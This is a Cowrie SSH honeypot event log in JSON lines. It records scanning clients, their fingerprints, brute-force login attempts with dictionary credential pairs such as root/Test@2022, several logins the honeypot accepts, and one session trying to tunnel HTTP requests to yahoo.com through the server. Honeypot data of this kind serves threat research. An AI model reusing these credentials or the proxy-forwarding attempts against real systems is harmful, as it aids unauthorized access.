{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:14:27.365442Z","src_ip":"35.244.25.124","session":"084b8a502842"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:14:27.613491Z","src_ip":"35.244.25.124","session":"084b8a502842"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T11:14:28.612865Z","src_ip":"35.244.25.124","session":"084b8a502842"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:14:29.863940Z","src_ip":"35.244.25.124","session":"084b8a502842"}
{"eventid":"cowrie.session.connect","src_ip":"35.244.25.124","src_port":60018,"dst_ip":"1.2.3.4","dst_port":22,"session":"8501f0db916d","protocol":"ssh","message":"New connection: 35.244.25.124:60018 (1.2.3.4:22) [session: 8501f0db916d]","sensor":"my-vps","timestamp":"2025-08-26T11:14:30.110781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:14:30.112784Z","src_ip":"35.244.25.124","session":"8501f0db916d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":59646,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ebef1377865","protocol":"ssh","message":"New connection: 196.251.86.249:59646 (1.2.3.4:22) [session: 1ebef1377865]","sensor":"my-vps","timestamp":"2025-08-26T11:14:30.234833Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:14:30.364448Z","src_ip":"35.244.25.124","session":"8501f0db916d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:14:30.725228Z","src_ip":"196.251.86.249","session":"1ebef1377865"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:14:30.783474Z","src_ip":"196.251.86.249","session":"1ebef1377865"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:14:31.363806Z","src_ip":"35.244.25.124","session":"8501f0db916d"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:14:31.613210Z","src_ip":"35.244.25.124","session":"3058f9788d1d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:14:31.614337Z","src_ip":"35.244.25.124","session":"8501f0db916d"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"test123","message":"login attempt [hadoop/test123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:14:32.400419Z","src_ip":"196.251.86.249","session":"1ebef1377865"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:14:34.047894Z","src_ip":"196.251.86.249","session":"1ebef1377865"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":44924,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a9fff7f8033","protocol":"ssh","message":"New connection: 139.19.117.131:44924 (1.2.3.4:22) [session: 3a9fff7f8033]","sensor":"my-vps","timestamp":"2025-08-26T11:14:44.372073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:14:44.373063Z","src_ip":"139.19.117.131","session":"3a9fff7f8033"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T11:14:44.389486Z","src_ip":"139.19.117.131","session":"3a9fff7f8033"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"90:ce:99:35:5b:c2:d6:75:cf:0c:da:cc:1d:c3:2c:fe","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxSBxcGOVf4pNhCl4tXN1ZgGz1MdEv2bdiWJdvS0YQJQEd+m2j53Hc90nYoSeQEnAJfTcAW/VR3PEZNmFbfChWSAAHGl3wuKYfUHvJ5qhSjx9mu3d5CoLdhh3mkPf4RXePegmzEc9VXmBuCmd4Ms2F+ysvu47+tSN/2bFASKwyU71xpr+jMMTAL3Xy2mBp2kXqephgmYW1w3Wv+UjgMjCttW+7p64lgUcoU5ZEH7h50IIztmTcIVvQyzffcFcB+F7aNoUpyqgJL+vlYEM0EDTZVaWFy2/SQQlZYgX9BUVNlkTehBtKk8uKfNgZ0gVfDEquleE7lc+ra+QHA+IBvrCj","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 90:ce:99:35:5b:c2:d6:75:cf:0c:da:cc:1d:c3:2c:fe","sensor":"my-vps","timestamp":"2025-08-26T11:14:44.424141Z","src_ip":"139.19.117.131","session":"3a9fff7f8033"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"90:ce:99:35:5b:c2:d6:75:cf:0c:da:cc:1d:c3:2c:fe","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxSBxcGOVf4pNhCl4tXN1ZgGz1MdEv2bdiWJdvS0YQJQEd+m2j53Hc90nYoSeQEnAJfTcAW/VR3PEZNmFbfChWSAAHGl3wuKYfUHvJ5qhSjx9mu3d5CoLdhh3mkPf4RXePegmzEc9VXmBuCmd4Ms2F+ysvu47+tSN/2bFASKwyU71xpr+jMMTAL3Xy2mBp2kXqephgmYW1w3Wv+UjgMjCttW+7p64lgUcoU5ZEH7h50IIztmTcIVvQyzffcFcB+F7aNoUpyqgJL+vlYEM0EDTZVaWFy2/SQQlZYgX9BUVNlkTehBtKk8uKfNgZ0gVfDEquleE7lc+ra+QHA+IBvrCj","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T11:14:44.424770Z","src_ip":"139.19.117.131","session":"3a9fff7f8033"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"90:ce:99:35:5b:c2:d6:75:cf:0c:da:cc:1d:c3:2c:fe","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxSBxcGOVf4pNhCl4tXN1ZgGz1MdEv2bdiWJdvS0YQJQEd+m2j53Hc90nYoSeQEnAJfTcAW/VR3PEZNmFbfChWSAAHGl3wuKYfUHvJ5qhSjx9mu3d5CoLdhh3mkPf4RXePegmzEc9VXmBuCmd4Ms2F+ysvu47+tSN/2bFASKwyU71xpr+jMMTAL3Xy2mBp2kXqephgmYW1w3Wv+UjgMjCttW+7p64lgUcoU5ZEH7h50IIztmTcIVvQyzffcFcB+F7aNoUpyqgJL+vlYEM0EDTZVaWFy2/SQQlZYgX9BUVNlkTehBtKk8uKfNgZ0gVfDEquleE7lc+ra+QHA+IBvrCj","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 90:ce:99:35:5b:c2:d6:75:cf:0c:da:cc:1d:c3:2c:fe","sensor":"my-vps","timestamp":"2025-08-26T11:14:44.442149Z","src_ip":"139.19.117.131","session":"3a9fff7f8033"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"90:ce:99:35:5b:c2:d6:75:cf:0c:da:cc:1d:c3:2c:fe","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxSBxcGOVf4pNhCl4tXN1ZgGz1MdEv2bdiWJdvS0YQJQEd+m2j53Hc90nYoSeQEnAJfTcAW/VR3PEZNmFbfChWSAAHGl3wuKYfUHvJ5qhSjx9mu3d5CoLdhh3mkPf4RXePegmzEc9VXmBuCmd4Ms2F+ysvu47+tSN/2bFASKwyU71xpr+jMMTAL3Xy2mBp2kXqephgmYW1w3Wv+UjgMjCttW+7p64lgUcoU5ZEH7h50IIztmTcIVvQyzffcFcB+F7aNoUpyqgJL+vlYEM0EDTZVaWFy2/SQQlZYgX9BUVNlkTehBtKk8uKfNgZ0gVfDEquleE7lc+ra+QHA+IBvrCj","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T11:14:44.442899Z","src_ip":"139.19.117.131","session":"3a9fff7f8033"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:14:54.372359Z","src_ip":"139.19.117.131","session":"3a9fff7f8033"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":11496,"dst_ip":"1.2.3.4","dst_port":22,"session":"2402b8f9a70d","protocol":"ssh","message":"New connection: 213.209.150.239:11496 (1.2.3.4:22) [session: 2402b8f9a70d]","sensor":"my-vps","timestamp":"2025-08-26T11:15:10.540959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:15:10.541756Z","src_ip":"213.209.150.239","session":"2402b8f9a70d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T11:15:10.589303Z","src_ip":"213.209.150.239","session":"2402b8f9a70d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:15:10.825791Z","src_ip":"213.209.150.239","session":"2402b8f9a70d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":20738,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:20738","sensor":"my-vps","timestamp":"2025-08-26T11:15:10.873820Z","session":"2402b8f9a70d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T11:15:10.921157Z","src_ip":"213.209.150.239","session":"2402b8f9a70d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":19725,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19725","sensor":"my-vps","timestamp":"2025-08-26T11:15:11.057524Z","session":"2402b8f9a70d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T11:15:11.104736Z","src_ip":"213.209.150.239","session":"2402b8f9a70d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:15:11.152870Z","src_ip":"213.209.150.239","session":"2402b8f9a70d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55578,"dst_ip":"1.2.3.4","dst_port":22,"session":"040cd14c8044","protocol":"ssh","message":"New connection: 217.72.205.35:55578 (1.2.3.4:22) [session: 040cd14c8044]","sensor":"my-vps","timestamp":"2025-08-26T11:15:16.056169Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:15:16.057232Z","src_ip":"217.72.205.35","session":"040cd14c8044"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":38260,"dst_ip":"1.2.3.4","dst_port":22,"session":"c26a6d1a82de","protocol":"ssh","message":"New connection: 45.88.8.215:38260 (1.2.3.4:22) [session: c26a6d1a82de]","sensor":"my-vps","timestamp":"2025-08-26T11:15:20.035307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:15:20.373562Z","src_ip":"45.88.8.215","session":"c26a6d1a82de"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:15:20.374870Z","src_ip":"45.88.8.215","session":"c26a6d1a82de"}
{"eventid":"cowrie.login.success","username":"root","password":"Manhar@123","message":"login attempt [root/Manhar@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:15:22.626039Z","src_ip":"45.88.8.215","session":"c26a6d1a82de"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:15:23.128891Z","src_ip":"45.88.8.215","session":"c26a6d1a82de"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":59478,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1ef048f97fa","protocol":"ssh","message":"New connection: 196.251.86.249:59478 (1.2.3.4:22) [session: c1ef048f97fa]","sensor":"my-vps","timestamp":"2025-08-26T11:15:30.469664Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:15:31.056345Z","src_ip":"196.251.86.249","session":"c1ef048f97fa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:15:31.057044Z","src_ip":"196.251.86.249","session":"c1ef048f97fa"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"test321","message":"login attempt [hadoop/test321] failed","sensor":"my-vps","timestamp":"2025-08-26T11:15:32.900054Z","src_ip":"196.251.86.249","session":"c1ef048f97fa"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:15:34.591130Z","src_ip":"196.251.86.249","session":"c1ef048f97fa"}
{"eventid":"cowrie.session.connect","src_ip":"168.167.228.123","src_port":28248,"dst_ip":"1.2.3.4","dst_port":22,"session":"66468252f2cb","protocol":"ssh","message":"New connection: 168.167.228.123:28248 (1.2.3.4:22) [session: 66468252f2cb]","sensor":"my-vps","timestamp":"2025-08-26T11:15:45.966915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:15:45.967918Z","src_ip":"168.167.228.123","session":"66468252f2cb"}
